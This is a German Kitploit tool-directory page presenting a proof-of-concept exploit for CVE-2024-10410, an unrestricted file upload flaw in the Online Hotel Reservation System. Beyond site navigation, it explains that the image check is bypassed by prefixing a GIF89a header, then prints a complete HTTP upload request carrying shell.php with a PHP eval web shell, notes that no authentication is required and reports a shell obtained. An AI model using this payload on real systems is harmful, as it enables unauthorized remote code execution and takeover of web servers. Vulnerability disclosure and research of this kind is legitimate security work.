Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2024-10410 — Proof-of-Concept-Exploit für CVE-2024-10410: uneingeschränkter Dateiupload im Online Hotel Reservation System. Demonstriert die Umgehung der Bildvalidierung durch GIF-Header-Injektion, um eine Remote-Code-Ausführung zu erreichen. | Kitploit
Tools/GitHubGitHub/k1nakoo/cve-2024-10410
Payload-GenerierungSchwachstellenanalyseCode-AnalyseExploitationWebanwendungs-ExploitationPenetrationstests
GitHubk1nakoo/cve-2024-10410

CVE-2024-10410

Proof-of-Concept-Exploit für CVE-2024-10410: uneingeschränkter Dateiupload im Online Hotel Reservation System. Demonstriert die Umgehung der Bildvalidierung durch GIF-Header-Injektion, um eine Remote-Code-Ausführung zu erreichen.

Repository anzeigen
6vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

Quellcode

Online Hotelreservierungssystem in PHP/MySQLi mit Quellcode | SourceCodester

Beschreibung

Eine hochriskante Sicherheitslücke wurde im Online Hotel Reservation System gefunden, die die Upload-Funktion der Datei /marimar/admin/mod_room/controller.php betrifft. Die Umgehung der Erkennungsoperation des Bildparameters führte zu unbegrenztem Datei-Upload. Angriffe können remote durchgeführt werden.

Schwachstellenanalyse

marimar\admin\mod_room\controller.php

image-20241025214231335

Nachdem die Datei hochgeladen wurde, ändert die Variable $image_name den Dateinamen auf das aktuelle Jahr, Monat und Tag und fügt dann _ sowie den hochgeladenen Dateinamen hinzu.

Die Schwachstelle liegt in der Variable $image_size, die erkennt, ob es sich um eine Bilddatei handelt, und andernfalls den Upload deaktiviert. Wir müssen also nur den Header des Bildes vor die injizierte schädliche Datei setzen, um die Erkennung zu umgehen.

Reproduktion der Schwachstelle

root@kitploit:~
POST http://localhost/marimar/admin/mod_room/controller.php?action=add HTTP/1.1
Host: 
Content-Length: 895
Cache-Control: max-age=0
Upgrade-Insecure-Requests: 1
Origin: 
Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryAQkzg4xV416LmyFO
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/127.0.0.0 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
Referer: http://10.151.167.168/marimar/admin/mod_room/index.php?view=add
Accept-Encoding: gzip, deflate, br
Accept-Language: zh-CN,zh;q=0.9
Cookie: PHPSESSID=
Connection: keep-alive

------WebKitFormBoundaryAQkzg4xV416LmyFO
Content-Disposition: form-data; name="ROOM"

test
------WebKitFormBoundaryAQkzg4xV416LmyFO
Content-Disposition: form-data; name="ACCOMID"

12
------WebKitFormBoundaryAQkzg4xV416LmyFO
Content-Disposition: form-data; name="ROOMDESC"

123123
------WebKitFormBoundaryAQkzg4xV416LmyFO
Content-Disposition: form-data; name="NUMPERSON"

4
------WebKitFormBoundaryAQkzg4xV416LmyFO
Content-Disposition: form-data; name="PRICE"

112
------WebKitFormBoundaryAQkzg4xV416LmyFO
Content-Disposition: form-data; name="ROOMNUM"

1
------WebKitFormBoundaryAQkzg4xV416LmyFO
Content-Disposition: form-data; name="image"; filename="shell.php"
Content-Type: image/png

GIF89a

<?php eval($_POST['k1nako']);?>
------WebKitFormBoundaryAQkzg4xV416LmyFO
Content-Disposition: form-data; name="save"


------WebKitFormBoundaryAQkzg4xV416LmyFO--

Dem schädlichen Code wurde GIF89a vorangestellt, das als gif getarnt ist. Erstelle das Upload-Paket, und du siehst, dass das Cookie gelöscht wird, was darauf hinweist, dass das System keine Authentifizierung hat und Angriffe remote gestartet werden können.

image-20241025215613249

Obwohl es eine Warnung gab, wurde die Datei erfolgreich hochgeladen, und der Dateiname wurde basierend auf der aktuellen Zeit 2024/10/25 21:55 abgeleitet.

image-20241025220014780

image-20241025220151381

Shell erfolgreich erhalten.

Tool herunterladen